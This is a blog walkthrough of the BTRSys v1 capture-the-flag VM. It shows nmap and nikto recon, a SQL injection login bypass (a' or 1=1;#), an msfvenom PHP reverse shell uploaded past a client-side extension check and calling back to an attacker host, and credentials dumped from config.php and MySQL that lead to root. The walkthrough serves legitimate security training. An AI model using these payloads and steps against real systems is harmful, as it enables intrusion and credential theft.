Amonsec

It's all about security.

A simple blog where you can find different things about digital security.

BTRSys v1: CTF walkthrough

 Introduction

Name: BTRSys: v1
Date release: 8 Jun 2017

Author: ismailonderkaya
Series: BTRSys
VM link: https://www.vulnhub.com/entry/btrsys-v1,195/

 

Recognition

We can find the IP address of the vulnerable system with arp-scan.

btrsys_v1_ctf_walkthrough_arp_scan.png

We scan the targeted system with nmap.

root@kali:~/Desktop# nmap 192.168.1.47 -p- -A -O -T5 --reason

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-15 16:19 CEST
Warning: 192.168.1.47 giving up on port because retransmission cap hit (2).
Nmap scan report for yoda.home (192.168.1.47)
Host is up, received arp-response (0.012s latency).
Not shown: 65377 closed ports, 155 filtered ports
Reason: 65377 resets and 155 no-responses
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 64 vsftpd 3.0.2
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.1.107
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 600
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|   256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_  256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (EdDSA)
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: BTRisk
MAC Address: 24:0A:64:9E:6E:74 (AzureWave Technology)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   12.07 ms yoda.home (192.168.1.47)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 244.95 seconds
root@kali:~/Desktop#

We can use the FTP service (as anonymous) but the directory is empty. So, only the port 80 will be used.

 

Login page

Weirdly, gobuster didn’t find the login.php page, so, I used nikto.

root@kali:~/Desktop# nikto -host 192.168.1.47
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.47
+ Target Hostname:    192.168.1.47
+ Target Port:        80
+ Start Time:         2017-10-15 16:32:11 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80 
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7535 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2017-10-15 16:33:38 (GMT2) (87 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The login.php page is a basic login page but two restrictions need to be bypass.

<script type="text/javascript">

function control(){
    var user = document.getElementById("user").value;
    var pwd = document.getElementById("pwd").value;

    var str=user.substring(user.lastIndexOf("@")+1,user.length);

    if((pwd == "'")){
        alert("Hack Denemesi !!!");

    }
    else if (str!="btrisk.com"){
        alert("Yanlis Kullanici Bilgisi Denemektesiniz");

    }    
    else{

      document.loginform.submit();
    }
}
</script>

The username need to contain “@btrisk.com” string and we can’t use a single quote for the password. All that sound like an HTTP form vulnerable to an SQL injection. After different tries, this one seems to work for me: a’ or 1=1;#

We have access to a file input form, I hope this input is sanitised.

 

From JPG to reverse shell

One more time, this input have only one restriction. We can upload only JPG, GIF or PNG files.

<script type="text/javascript">
        // accept=".jpg,.png"
function getFile(){
    var filename = document.getElementById("dosya").value;
    var sonuc = ((/[.]/.exec(filename)) ? /[^.]+$/.exec(filename) : undefined);
    if((sonuc == "jpg") || (sonuc == "gif") || (sonuc == "png")){
        document.myform.submit();
    }else{
        //mesaj
        alert("Yanlizca JPG,PNG dosyalari yukleyebilirsiniz.");
        return false;


    }
}
</script>

The problem with that, is that the security check is done only in the client side. So, if we intercept the sent packet with Burp Suite and if we change the extension of the file for a php file we will be able to upload a php reverse shell.

We generate a php reverse shell called shell.jpg.

root@kali:~/Desktop# msfvenom -p php/meterpreter/reverse_tcp LPORT=1337 LHOST=192.168.1.107 -o rshell.jpg
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 964 bytes
Saved as: rshell.jpg
root@kali:~/Desktop#

We configure our Metasploit handler.

root@kali:~/Desktop# msfconsole -q
msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 1337
LPORT => 1337
msf exploit(handler) > set LHOST 192.168.1.107
LHOST => 192.168.1.107
msf exploit(handler) > run 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.107:1337 
msf exploit(handler) >

Finally, we configure Burp Suite to intercept the outgoing traffic, we upload the rshell.jpg file and then we change the extension of our reverse shell.

btrsys_v1_ctf_walkthrough_burpsuite_change_rshell_extension.png

Now, we have a reverse shell.

btrsys_v1_ctf_walkthrough_low_reverse_shell.png
 

Privilege escalation

First of all, we start a shell.

meterpreter > shell
Process 3377 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@BTRsys1:/var/www/html/uploads$ export TERM=linux
export TERM=linux
www-data@BTRsys1:/var/www/html/uploads$

Then we will take a look at this interesting file: config.php.

www-data@BTRsys1:/var/www/html/uploads$ cd ..
cd ..
www-data@BTRsys1:/var/www/html$ cat config.php
cat config.php
<?php
/////////////////////////////////////////////////////////////////////////////////////////
$con=mysqli_connect("localhost","root","toor","deneme");
if (mysqli_connect_errno())
  {
  echo "Mysql Bağlantı hatası!: " . mysqli_connect_error();
  }
/////////////////////////////////////////////////////////////////////////////////////////
?>

www-data@BTRsys1:/var/www/html$

We found MySQL credentials.

Let’s use them and explore the MySQL database “deneme”.

www-data@BTRsys1:/var/www/html$ mysql -uroot -p -Ddeneme
mysql -uroot -p -Ddeneme
Enter password: toor

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 118197
Server version: 5.5.55-0ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show tables;
show tables;
+------------------+
| Tables_in_deneme |
+------------------+
| user             |
+------------------+
1 row in set (0.00 sec)

mysql>

Now, we will show the content of this table.

mysql> select * from user;
select * from user;
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
| ID | Ad_Soyad    | Kullanici_Adi    | Parola    | BabaAdi | BabaMeslegi | AnneAdi | AnneMeslegi | KardesSayisi |
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
|  1 | ismail kaya | ikaya@btrisk.com | asd123*** | ahmet   | muhasebe    | nazli   | lokantaci   |            5 |
|  2 | can demir   | cdmir@btrisk.com | asd123*** | mahmut  | memur       | gulsah  | tuhafiyeci  |            8 |
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
2 rows in set (0.00 sec)

mysql>

Two users with the same password.
 

mysql> quit
quit
Bye
www-data@BTRsys1:/var/www/html$ su root
su root
Password: asd123***

root@BTRsys1:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root)
root@BTRsys1:/var/www/html#

We have a root access to this system.

btrsys_v1_ctf_walkthrough_rooted.png
 
 

break